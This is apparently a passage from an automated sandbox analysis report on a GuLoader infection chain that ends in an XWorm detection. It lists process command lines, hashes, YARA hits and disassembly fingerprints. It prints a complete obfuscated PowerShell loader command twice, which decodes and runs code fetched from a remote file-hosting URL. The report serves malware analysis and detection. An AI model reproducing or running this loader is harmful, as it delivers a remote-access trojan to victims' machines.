Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. 
';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBalfahu.sol)Pregl ');$Overmuch=$Shadow[0];Handelsmssiges (Tilsynsraads 'Mdele$Trib.gThrallAb teoAnderbWa.fna rudelMinut:SlambS Achtp,lycoeTr,ttkHermauKyurilGerataCossetSem fiKrseloRevoln,verheT.bernKnebnsMetri=lyksaN StateInspiw Rein-PreauOPr kub Gennj,assieStarec Fivet Extr GalloSBaelgyPlje sUnhumtUnshoeUnaffm Kali.B.rtsNMi.abeSpiontAc ou.ConseWFremdeIndflbSkrm.CReb,ll 
aproiKnutseDelirn,leritRemi ');Handelsmssiges (Tilsynsraads 'Thind$HistrSNonsep ikole CammkStranuDemiulJuic,aUn ect Byg.iJenfooAppeln Ans eScentn.elefsOpera.Ja.ihHEg treTric aGammedBefarePer prInhausYderv[ Drab$ScrofMM.rcueColobl tanl Die,iDestrtPardae elfo].aron= Disk$AnthoTIn.sloPe gen So,riVandlsStjerkprv,pep eudsTilly ');$Suges=Tilsynsraads 'AfregSBramsp LipeeJordvk Pa,luFil,vlnotesaG.debtEnspnisogneoMyc.hnClarieMorgenS,uffsHyper.Ops aDSwineofarvew Pr,tnFremtlPrep.oKompla LanddVr.nsFReintiSereslPhotoeRot r(Pilik$EuropOGlasuvDesaveG.novrAllatmTrisauLdermcA.oophSalva,Stand$ IndoBN.phruWestbb igenaHerpelStileeInt,a)Affyr ';$Suges=$Provisionment[1]+$Suges;$Bubale=$Provisionment[0];Handelsmssiges (Tilsynsraads ' Lvsa$Ska pgUntrel sol.oUdkrsbSrintaVandalDyree:.ylenPCenterAuteciFaggynMycflt G ndeCyli r StivmMatfuaLimitnSammeublystaLaxnelGratasTheop=unt.n(Fj rkTCrypteUnr,ss.ndiatCrean- MoreP PedaaSubartSvrddhHors. Can,l$W.rkmBmilliuTauntboxidia atilUndere Oute)disqu ');while (!$Printermanuals) {Handelsmssiges (Tilsynsraads 'Ankep$ etamgPa lilCo.feoEpithbFysikaMaraglTampo:MulseM DybdaCrip.x RevaiA.putmN.rkoiPoritnCloud= oyol$Bo.dstudelurIn lauSpanse nre ') ;Handelsmssiges $Suges;Handelsmssiges (Tilsynsraads 'SeverSMunketPanoraNothorstvdrtStefa-Om.ilSF,rbilAa yneThyrae MaripTvist Bac,l4 iske ');Handelsmssiges (Tilsynsraads ',egae$KallugAn.iglStikboV,klebHangaaGr,ndlVe tb:WinetP Rod.rBefe.i ,rognostintKs.bleSan,erSkorsmKommaaStoddnFrst,uBere,a Hippl redisTas,e= Inte( FlerT SquaeOverasAnsigt Keci-coeliP Sam a DisktHoneyhAutom Chlor$JunkeBC.lliuMar.ebRhinoaPerf,lSkn,ee Mach)Fr dr ') ;Handelsmssiges (Tilsynsraads ' hodm$FeltdgsatirlJord,o Amphb FarvaDire lPdago:DagskPJuramadigasnRuneitRapereL.totlInduse T ergA.voke SansnFlopheTanha7Blind9Karto=Bur,a$SyncogHaemol No.do.ybvabspeciaKinemlSinte:PatriSLu,esiTrapemSk.nkoPol.enForfaiGaldeaStueecMartyaConcel Tr nlScouryKon.i+ Ford+Bre b%Tripl$ MyceSBetjehAllo,aAcrocdMdereoQu ntwSkvad.Work,c Sd uoScoffuSkelnnTepoytminar ') 
;$Overmuch=$Shadow[$Pantelegene79];}$Arkitekttegnes=307942;$sybaritisk=28763;Handelsmssiges (Tilsynsraads 'T.ans$R,allgRoxanl Adreo ophobWi,liaMenthlEnhed:EoghaAV ksetMonteosmokim Javab PyocePrimav KirkbPlissn .kvue AmansSprjt P.eum=Halvg S.favGUdspae Vel.tRa,ca-H glsC Min.o jern .eklt.dehie,ptranAmatrtUnrot Assur$M demB ukkeuAccoubPlumbaUnconlNonareUdskr ');Handelsmssiges (Tilsynsraads 'All m$DancigSa.inlMedlio RepubfjendaN,nsclP,rio:KlavrA Baued SlughMatede Immaselastitri.av,orbueUnb.omGangaeCo,vet,surpeRob.arseams Bipon=om os Belve[FloriSBruteyInconsKommat FleteSaul.mSvikl. TetrCSalmioUd,tynPri.ovva.dleAnsttrSquamtFloss]Maj.s: A,to: AfkrFHjhusr C acoMystimIndtaB CigaaNy,ansTegnfeDehyd6Elfre4SprngS .yketStvdrrMar.viIn.ennWay,lgF,ktu(,rams$jepscAVersitArc,eoCedarm Tyv.bArmcheSu.fav W rtb TorbnPredee M,nusR hei)Micro ');Handelsmssiges (Tilsynsraads 'Selva$TidsrgNephil S,umoTroppbPrepeaD,ivml Bofo:M inmWBe reiNonzoeWrithnNon.eeFatt rArverp Ti slU eclsAt,mkeW.rldn Ond,sSorro deci= Digt Huntl[RenteSP adsy ProdsDdsaatProtaeC,rkumsubar..uffeTIndiveGravexoutp,tHum.e. rhveE,uartnUnb,ncBabasoPoss,dFar.eiS kiynBedimg Phal]Dezym:.nska:Mor.eAHydroSgell,CCabinIb.uttIprofe.EngleGpennae Respt.orurSB,evtt Ved.r.nciniMonofnAmplig,lugt(Foobo$Pa alA UdmudS.akeh Le,eeVikkes Tilsi,enovvServie GlatmHepateForvrt Af reS hisrMili )Irchi ');Handelsmssiges (Tilsynsraads 'Metri$un.ncgNeurolAfsigoTill,b DaniaKa.inlGaffe:mono SSim.lm Smkfi CephtI dhehAntipsDenomoSatisn Radi= Terp$SophiWDeperiKalkpeNonconP ydaePri trHeusepP ranlac.omsidolieTa,rgnLejemsKl.nt. Metas SkiluD,linbSyndrsDepo,t,gehvr ElefiForhanIndekg Exte(Dybfr$ThiouA H,ghrSanerkTilsliDe,astKap ie MakukFla stMyrert,hiaseopbudgKlov,nHexanePoachsO,era,Satur$UrinosOp,luyF.bribInwitaS udsrCacodiGi.gltFrdseiAl essUdplakhelic)Tilsl ');Handelsmssiges $Smithson;"
                                                                        Imagebase:0x7ff760310000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:10
                                                                        Start time:12:25:07
                                                                        Start date:23/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff70f010000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:11
                                                                        Start time:12:25:09
                                                                        Start date:23/05/2024
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"
                                                                        Imagebase:0x7ff7da7d0000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:13
                                                                        Start time:12:25:17
                                                                        Start date:23/05/2024
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. 
';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBalfahu.sol)Pregl ');$Overmuch=$Shadow[0];Handelsmssiges (Tilsynsraads 'Mdele$Trib.gThrallAb teoAnderbWa.fna rudelMinut:SlambS Achtp,lycoeTr,ttkHermauKyurilGerataCossetSem fiKrseloRevoln,verheT.bernKnebnsMetri=lyksaN StateInspiw Rein-PreauOPr kub Gennj,assieStarec Fivet Extr GalloSBaelgyPlje sUnhumtUnshoeUnaffm Kali.B.rtsNMi.abeSpiontAc ou.ConseWFremdeIndflbSkrm.CReb,ll 
aproiKnutseDelirn,leritRemi ');Handelsmssiges (Tilsynsraads 'Thind$HistrSNonsep ikole CammkStranuDemiulJuic,aUn ect Byg.iJenfooAppeln Ans eScentn.elefsOpera.Ja.ihHEg treTric aGammedBefarePer prInhausYderv[ Drab$ScrofMM.rcueColobl tanl Die,iDestrtPardae elfo].aron= Disk$AnthoTIn.sloPe gen So,riVandlsStjerkprv,pep eudsTilly ');$Suges=Tilsynsraads 'AfregSBramsp LipeeJordvk Pa,luFil,vlnotesaG.debtEnspnisogneoMyc.hnClarieMorgenS,uffsHyper.Ops aDSwineofarvew Pr,tnFremtlPrep.oKompla LanddVr.nsFReintiSereslPhotoeRot r(Pilik$EuropOGlasuvDesaveG.novrAllatmTrisauLdermcA.oophSalva,Stand$ IndoBN.phruWestbb igenaHerpelStileeInt,a)Affyr ';$Suges=$Provisionment[1]+$Suges;$Bubale=$Provisionment[0];Handelsmssiges (Tilsynsraads ' Lvsa$Ska pgUntrel sol.oUdkrsbSrintaVandalDyree:.ylenPCenterAuteciFaggynMycflt G ndeCyli r StivmMatfuaLimitnSammeublystaLaxnelGratasTheop=unt.n(Fj rkTCrypteUnr,ss.ndiatCrean- MoreP PedaaSubartSvrddhHors. Can,l$W.rkmBmilliuTauntboxidia atilUndere Oute)disqu ');while (!$Printermanuals) {Handelsmssiges (Tilsynsraads 'Ankep$ etamgPa lilCo.feoEpithbFysikaMaraglTampo:MulseM DybdaCrip.x RevaiA.putmN.rkoiPoritnCloud= oyol$Bo.dstudelurIn lauSpanse nre ') ;Handelsmssiges $Suges;Handelsmssiges (Tilsynsraads 'SeverSMunketPanoraNothorstvdrtStefa-Om.ilSF,rbilAa yneThyrae MaripTvist Bac,l4 iske ');Handelsmssiges (Tilsynsraads ',egae$KallugAn.iglStikboV,klebHangaaGr,ndlVe tb:WinetP Rod.rBefe.i ,rognostintKs.bleSan,erSkorsmKommaaStoddnFrst,uBere,a Hippl redisTas,e= Inte( FlerT SquaeOverasAnsigt Keci-coeliP Sam a DisktHoneyhAutom Chlor$JunkeBC.lliuMar.ebRhinoaPerf,lSkn,ee Mach)Fr dr ') ;Handelsmssiges (Tilsynsraads ' hodm$FeltdgsatirlJord,o Amphb FarvaDire lPdago:DagskPJuramadigasnRuneitRapereL.totlInduse T ergA.voke SansnFlopheTanha7Blind9Karto=Bur,a$SyncogHaemol No.do.ybvabspeciaKinemlSinte:PatriSLu,esiTrapemSk.nkoPol.enForfaiGaldeaStueecMartyaConcel Tr nlScouryKon.i+ Ford+Bre b%Tripl$ MyceSBetjehAllo,aAcrocdMdereoQu ntwSkvad.Work,c Sd uoScoffuSkelnnTepoytminar ') 
;$Overmuch=$Shadow[$Pantelegene79];}$Arkitekttegnes=307942;$sybaritisk=28763;Handelsmssiges (Tilsynsraads 'T.ans$R,allgRoxanl Adreo ophobWi,liaMenthlEnhed:EoghaAV ksetMonteosmokim Javab PyocePrimav KirkbPlissn .kvue AmansSprjt P.eum=Halvg S.favGUdspae Vel.tRa,ca-H glsC Min.o jern .eklt.dehie,ptranAmatrtUnrot Assur$M demB ukkeuAccoubPlumbaUnconlNonareUdskr ');Handelsmssiges (Tilsynsraads 'All m$DancigSa.inlMedlio RepubfjendaN,nsclP,rio:KlavrA Baued SlughMatede Immaselastitri.av,orbueUnb.omGangaeCo,vet,surpeRob.arseams Bipon=om os Belve[FloriSBruteyInconsKommat FleteSaul.mSvikl. TetrCSalmioUd,tynPri.ovva.dleAnsttrSquamtFloss]Maj.s: A,to: AfkrFHjhusr C acoMystimIndtaB CigaaNy,ansTegnfeDehyd6Elfre4SprngS .yketStvdrrMar.viIn.ennWay,lgF,ktu(,rams$jepscAVersitArc,eoCedarm Tyv.bArmcheSu.fav W rtb TorbnPredee M,nusR hei)Micro ');Handelsmssiges (Tilsynsraads 'Selva$TidsrgNephil S,umoTroppbPrepeaD,ivml Bofo:M inmWBe reiNonzoeWrithnNon.eeFatt rArverp Ti slU eclsAt,mkeW.rldn Ond,sSorro deci= Digt Huntl[RenteSP adsy ProdsDdsaatProtaeC,rkumsubar..uffeTIndiveGravexoutp,tHum.e. rhveE,uartnUnb,ncBabasoPoss,dFar.eiS kiynBedimg Phal]Dezym:.nska:Mor.eAHydroSgell,CCabinIb.uttIprofe.EngleGpennae Respt.orurSB,evtt Ved.r.nciniMonofnAmplig,lugt(Foobo$Pa alA UdmudS.akeh Le,eeVikkes Tilsi,enovvServie GlatmHepateForvrt Af reS hisrMili )Irchi ');Handelsmssiges (Tilsynsraads 'Metri$un.ncgNeurolAfsigoTill,b DaniaKa.inlGaffe:mono SSim.lm Smkfi CephtI dhehAntipsDenomoSatisn Radi= Terp$SophiWDeperiKalkpeNonconP ydaePri trHeusepP ranlac.omsidolieTa,rgnLejemsKl.nt. Metas SkiluD,linbSyndrsDepo,t,gehvr ElefiForhanIndekg Exte(Dybfr$ThiouA H,ghrSanerkTilsliDe,astKap ie MakukFla stMyrert,hiaseopbudgKlov,nHexanePoachsO,era,Satur$UrinosOp,luyF.bribInwitaS udsrCacodiGi.gltFrdseiAl essUdplakhelic)Tilsl ');Handelsmssiges $Smithson;"
                                                                        Imagebase:0xf70000
                                                                        File size:433'152 bytes
                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.1850007327.0000000008450000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.1843333872.0000000005723000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000002.1850717650.0000000008D34000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:14
                                                                        Start time:12:25:19
                                                                        Start date:23/05/2024
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"
                                                                        Imagebase:0xc50000
                                                                        File size:236'544 bytes
                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:17
                                                                        Start time:12:25:44
                                                                        Start date:23/05/2024
                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                        Imagebase:0x2c0000
                                                                        File size:516'608 bytes
                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                          • Instruction Fuzzy Hash: 97626EB0A10219DFDB24DB28C991BDEB7B2BF89304F1085A9D9096B741CB75DE81CF91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k$x.k$-k
                                                                          • API String ID: 0-3142358075
                                                                          • Opcode ID: c208d1a0baca6a57e3faed97c7831f07fc1bd0a53adea2b06fbed36357a733ff
                                                                          • Instruction ID: b7723b07dc79ce9d255393ab36c912d032ea3909eee01fccba4c7a4d2b6b314e
                                                                          • Opcode Fuzzy Hash: c208d1a0baca6a57e3faed97c7831f07fc1bd0a53adea2b06fbed36357a733ff
                                                                          • Instruction Fuzzy Hash: BBF19EB0A102159FEB24DB18C951FAEB7B6BF84300F10C5A9D5096FB91DB71ED818F91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k$x.k$-k
                                                                          • API String ID: 0-3142358075
                                                                          • Opcode ID: fc9671f5e5ff7a5c129b329ce6949c37b8bf7b935c4bc0a62ad08837d93a7276
                                                                          • Instruction ID: 83e5afced18f9e45f963b6f439c66594157b0382b7636d2afbd2886b2221ecdd
                                                                          • Opcode Fuzzy Hash: fc9671f5e5ff7a5c129b329ce6949c37b8bf7b935c4bc0a62ad08837d93a7276
                                                                          • Instruction Fuzzy Hash: 64E190B0B002189FD714DB68C895BAEB7B2BF84304F1185A9D909AF791CF75DE818F91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 84l$84l
                                                                          • API String ID: 0-1651897244
                                                                          • Opcode ID: 1c425ee24ae9f04d3a13c8ff63923e0e86a342c6ed28be268a24a07494b040b9
                                                                          • Instruction ID: b250f21ea0cbd530a54730e0012b8458b429297d523bb1ab9c913e29d805e25e
                                                                          • Opcode Fuzzy Hash: 1c425ee24ae9f04d3a13c8ff63923e0e86a342c6ed28be268a24a07494b040b9
                                                                          • Instruction Fuzzy Hash: 23825AB0B202069FDB14CB98C481B6ABBF2BF99314F25C169E8059F755DB72EC41CB91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k$x.k
                                                                          • API String ID: 0-2289991263
                                                                          • Opcode ID: 43d1ceb854fa89d78625877b49bdbff927ed93bcce18f21f7df5fc753a1190d6
                                                                          • Instruction ID: 12a9aec92776f5e69cd21bd0de64e6c0638e39ce8768be8a3f3239767d5b3d0d
                                                                          • Opcode Fuzzy Hash: 43d1ceb854fa89d78625877b49bdbff927ed93bcce18f21f7df5fc753a1190d6
                                                                          • Instruction Fuzzy Hash: 80023AB4A00219DFDB24DB14C991BEDB7B2BB89304F1081EAD909AB741DB75DE81CF91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k$-k
                                                                          • API String ID: 0-766683181
                                                                          • Opcode ID: df102998fb6d805382e19ee6a51fa97a10a20b61cf67859c23edafa9b66640c9
                                                                          • Instruction ID: da6e5d3767306aa00c25f24ee32c1c70350de60239e9d9d185d5a8240e719f2a
                                                                          • Opcode Fuzzy Hash: df102998fb6d805382e19ee6a51fa97a10a20b61cf67859c23edafa9b66640c9
                                                                          • Instruction Fuzzy Hash: 05E182B4B102159FDB24DB58C891B9EBBB2BF84304F2085AAD5096F741CB75ED81CF91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k$-k
                                                                          • API String ID: 0-766683181
                                                                          • Opcode ID: bdfb19e2d1c49778d69774e0b8b7c277c442322bcd57d477328d58adf4dd292b
                                                                          • Instruction ID: 937ba7311feadafbbc537a16aca86ec1a53666f76cf26fe047ae79e201f29c4c
                                                                          • Opcode Fuzzy Hash: bdfb19e2d1c49778d69774e0b8b7c277c442322bcd57d477328d58adf4dd292b
                                                                          • Instruction Fuzzy Hash: 73D18EB0A212099FDB14DBA8C495B9EB7F2BF88304F25C529D4016F755CB76EC42CB91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k$-k
                                                                          • API String ID: 0-766683181
                                                                          • Opcode ID: 2ffaf4048886010f4244914ae35f51e37caab529f7f86d6e8397fb7ccb664563
                                                                          • Instruction ID: 034e626c72124725653feef1e0f16f0e26792276a04dd9113a4d505a13c9d5a7
                                                                          • Opcode Fuzzy Hash: 2ffaf4048886010f4244914ae35f51e37caab529f7f86d6e8397fb7ccb664563
                                                                          • Instruction Fuzzy Hash: 1AB1BEB0A252059FDB14DB98C484B9EBBF2BF88304F25C12AD4056F755CB76EC82CB91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k$-k
                                                                          • API String ID: 0-766683181
                                                                          • Opcode ID: 04b9aaaf8498dfd8957e47d2e06aef8396832d9b860a8e17dd3d75d8644b8f38
                                                                          • Instruction ID: e4275ffe213aa8088931abc760f07dc7d83e1674c9e284bebbc6fb7904ac4a7f
                                                                          • Opcode Fuzzy Hash: 04b9aaaf8498dfd8957e47d2e06aef8396832d9b860a8e17dd3d75d8644b8f38
                                                                          • Instruction Fuzzy Hash: 88A138B0A11219DBDB24DB18C991BEEB7B2BB89304F1081E5D9096B741CB75DE81CF91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000D.00000002.1846888104.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_13_2_7210000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: x.k
                                                                          • API String ID: 0-3814145804
                                                                          • Opcode ID: d0309580df3b14febd808c7e8c6b2cd09ce4c7e6f10d62618ea4b8bcfdd671ae
                                                                          • Instruction ID: 1fabbc5fc45aa9aac7e4479a06b5640d906a8d0ebd0026f500738994076a5b4e
                                                                          • Opcode Fuzzy Hash: d0309580df3b14febd808c7e8c6b2cd09ce4c7e6f10d62618ea4b8bcfdd671ae
